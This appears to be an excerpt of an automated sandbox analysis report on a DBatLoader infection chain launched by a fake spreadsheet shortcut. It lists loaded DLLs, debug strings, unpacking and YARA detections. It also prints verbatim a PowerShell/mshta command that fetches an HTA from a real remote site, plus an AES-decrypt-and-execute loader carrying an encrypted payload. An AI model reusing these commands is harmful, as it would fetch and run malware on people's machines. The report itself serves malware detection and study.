                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                    Source: FT. 40FE CNY .xlsx.lnkLNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: Binary string: calc.pdbGCTL source: mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1855006902.000001A2C46D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852363981.000001A2C46CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852558870.000001A2C46E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852439079.000001A2C46DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851615477.000001A2C4722000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852067245.000001A2C4393000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865516494.000001A2C46F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852507533.000001A2C4710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852261324.000001A2C46D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852234112.000001A2C438F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851691454.000001A2C438D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1853065476.000001A2C46E5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865380060.000001A2C46D1000.00000004.00000020.00020000.00000000.sdmp, yt[1].hta.9.dr
                    Source: Binary string: PSReadline.pdbaK source: powershell.exe, 00000011.00000002.1635136687.0000029E326E4000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.1629294581.0000029E323A0000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdb source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.19.dr
                    Source: Binary string: _.pdb source: bwsiuvcU.pif, 00000017.00000002.1680345757.000000003DA95000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000003.1516343993.000000003BDC9000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1681909755.0000000040260000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1681582310.000000003EDE1000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1787983024.0000000025D95000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1791650361.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1634916828.0000000023FF4000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1790805820.0000000026F71000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2555827704.0000000040350000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000003.1719620200.000000003BD8F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554498447.000000003DA65000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2555544877.000000003ED31000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: calc.pdb source: mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1855006902.000001A2C46D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852363981.000001A2C46CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852067245.000001A2C4393000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851691454.000001A2C438D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865380060.000001A2C46D1000.00000004.00000020.00020000.00000000.sdmp, yt[1].hta.9.dr
                    Source: Binary string: easinvoker.pdbH source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1514685918.0000000014B20000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.19.dr
                    Source: Binary string: owershell.PSReadline.pdb source: powershell.exe, 00000011.00000002.1629294581.0000029E32432000.00000004.00000020.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifUnpacked PE file: 23.2.bwsiuvcU.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifUnpacked PE file: 25.2.bwsiuvcU.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifUnpacked PE file: 27.2.bwsiuvcU.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifUnpacked PE file: 23.2.bwsiuvcU.pif.400000.0.unpack
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifUnpacked PE file: 25.2.bwsiuvcU.pif.400000.0.unpack
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifUnpacked PE file: 27.2.bwsiuvcU.pif.400000.0.unpack
                    Yara detected DBatLoader
                    Source: Yara matchFile source: 19.2.uc.exe.2980000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001A.00000002.1728089924.0000000002831000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.1499010628.0000000002385000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000003.1438376010.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.cs.Net Code: Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777238)),Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777265))})
                    Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.cs.Net Code: Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777238)),Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777265))})
                    Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.cs.Net Code: Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777238)),Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777265))})
                    Source: 23.2.bwsiuvcU.pif.3ede6478.5.raw.unpack, wrQqF835PFmCSFtGtO.cs.Net Code: Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777238)),Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777265))})
                    Source: 23.2.bwsiuvcU.pif.409c0000.8.raw.unpack, wrQqF835PFmCSFtGtO.cs.Net Code: Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777238)),Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777265))})
                    Found suspicious powershell code related to unpacking or dynamic code loading
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.Tra
                    Suspicious powershell command line found
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -Jump to behavior
                    Source: bwsiuvcU.pif.19.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_02997AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,19_2_02997AC0
                    Source: easinvoker.exe.19.drStatic PE information: section name: .imrsiv
                    Source: netutils.dll.19.drStatic PE information: section name: .xdata
                    Source: netutils.dll.19.drStatic PE information: section name: /4
                    Source: netutils.dll.19.drStatic PE information: section name: /19
                    Source: netutils.dll.19.drStatic PE information: section name: /31
                    Source: netutils.dll.19.drStatic PE information: section name: /45
                    Source: netutils.dll.19.drStatic PE information: section name: /57
                    Source: netutils.dll.19.drStatic PE information: section name: /70
                    Source: netutils.dll.19.drStatic PE information: section name: /81
                    Source: netutils.dll.19.drStatic PE information: section name: /92
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAAB95FB5D push esp; retf 17_2_00007FFAAB95FB5E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAAB958167 push ebx; ret 17_2_00007FFAAB95816A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAAB9584E1 push es; ret 17_2_00007FFAAB9584E2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAAB950CCE pushad ; retf 17_2_00007FFAAB950D3D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAABA244B4 push cs; ret 17_2_00007FFAABA244B6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAABA2433D push cs; ret 17_2_00007FFAABA2433F
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAABA24390 push cs; ret 17_2_00007FFAABA24392
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAABA242E8 push cs; ret 17_2_00007FFAABA242EA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAABA24209 push cs; ret 17_2_00007FFAABA24232
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAABA2914E push ss; ret 17_2_00007FFAABA2914F
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_029832F0 push eax; ret 19_2_0298332C
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_029AA2F4 push 029AA35Fh; ret 19_2_029AA357
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_0299D20C push ecx; mov dword ptr [esp], edx19_2_0299D211
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_02986372 push 029863CFh; ret 19_2_029863C7
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_02986374 push 029863CFh; ret 19_2_029863C7
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_029AA0AC push 029AA125h; ret 19_2_029AA11D
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_02993028 push 02993075h; ret 19_2_0299306D
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_02993027 push 02993075h; ret 19_2_0299306D
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_029AA1F8 push 029AA288h; ret 19_2_029AA280
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_029AA144 push 029AA1ECh; ret 19_2_029AA1E4
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_0298673E push 02986782h; ret 19_2_0298677A
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_02986740 push 02986782h; ret 19_2_0298677A
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_0298C528 push ecx; mov dword ptr [esp], edx19_2_0298C52D
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_0298D55C push 0298D588h; ret 19_2_0298D580
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_0298CBA8 push 0298CD2Eh; ret 19_2_0298CD26
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_02999B58 push 02999B90h; ret 19_2_02999B88
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_029A9B70 push 029A9D8Eh; ret 19_2_029A9D86
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_0298C8D6 push 0298CD2Eh; ret 19_2_0298CD26
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_029978C8 push 02997945h; ret 19_2_0299793D
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_02996902 push 029969AFh; ret 19_2_029969A7
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_02996904 push 029969AFh; ret 19_2_029969A7
                    Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.csHigh entropy of concatenated method names: 'ICAyBoI8nQ', 'KDikMXewCI', 'L8eyiSD8RZ', 'NWhy3UvHJp', 'hrcyqFProH', 'xbkytiDasQ', 'cE1voes021ZUN', 'ErtcfHgK7I', 'NFQcC8bA4F', 'TE6czWL5Zk'
                    Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.csHigh entropy of concatenated method names: 'ICAyBoI8nQ', 'KDikMXewCI', 'L8eyiSD8RZ', 'NWhy3UvHJp', 'hrcyqFProH', 'xbkytiDasQ', 'cE1voes021ZUN', 'ErtcfHgK7I', 'NFQcC8bA4F', 'TE6czWL5Zk'
                    Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.csHigh entropy of concatenated method names: 'ICAyBoI8nQ', 'KDikMXewCI', 'L8eyiSD8RZ', 'NWhy3UvHJp', 'hrcyqFProH', 'xbkytiDasQ', 'cE1voes021ZUN', 'ErtcfHgK7I', 'NFQcC8bA4F', 'TE6czWL5Zk'
                    Source: 23.2.bwsiuvcU.pif.3ede6478.5.raw.unpack, wrQqF835PFmCSFtGtO.csHigh entropy of concatenated method names: 'ICAyBoI8nQ', 'KDikMXewCI', 'L8eyiSD8RZ', 'NWhy3UvHJp', 'hrcyqFProH', 'xbkytiDasQ', 'cE1voes021ZUN', 'ErtcfHgK7I', 'NFQcC8bA4F', 'TE6czWL5Zk'
                    Source: 23.2.bwsiuvcU.pif.409c0000.8.raw.unpack, wrQqF835PFmCSFtGtO.csHigh entropy of concatenated method names: 'ICAyBoI8nQ', 'KDikMXewCI', 'L8eyiSD8RZ', 'NWhy3UvHJp', 'hrcyqFProH', 'xbkytiDasQ', 'cE1voes021ZUN', 'ErtcfHgK7I', 'NFQcC8bA4F', 'TE6czWL5Zk'

                    Persistence and Installation Behavior

                    barindex
                    Windows shortcut file (LNK) starts blacklisted processes
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
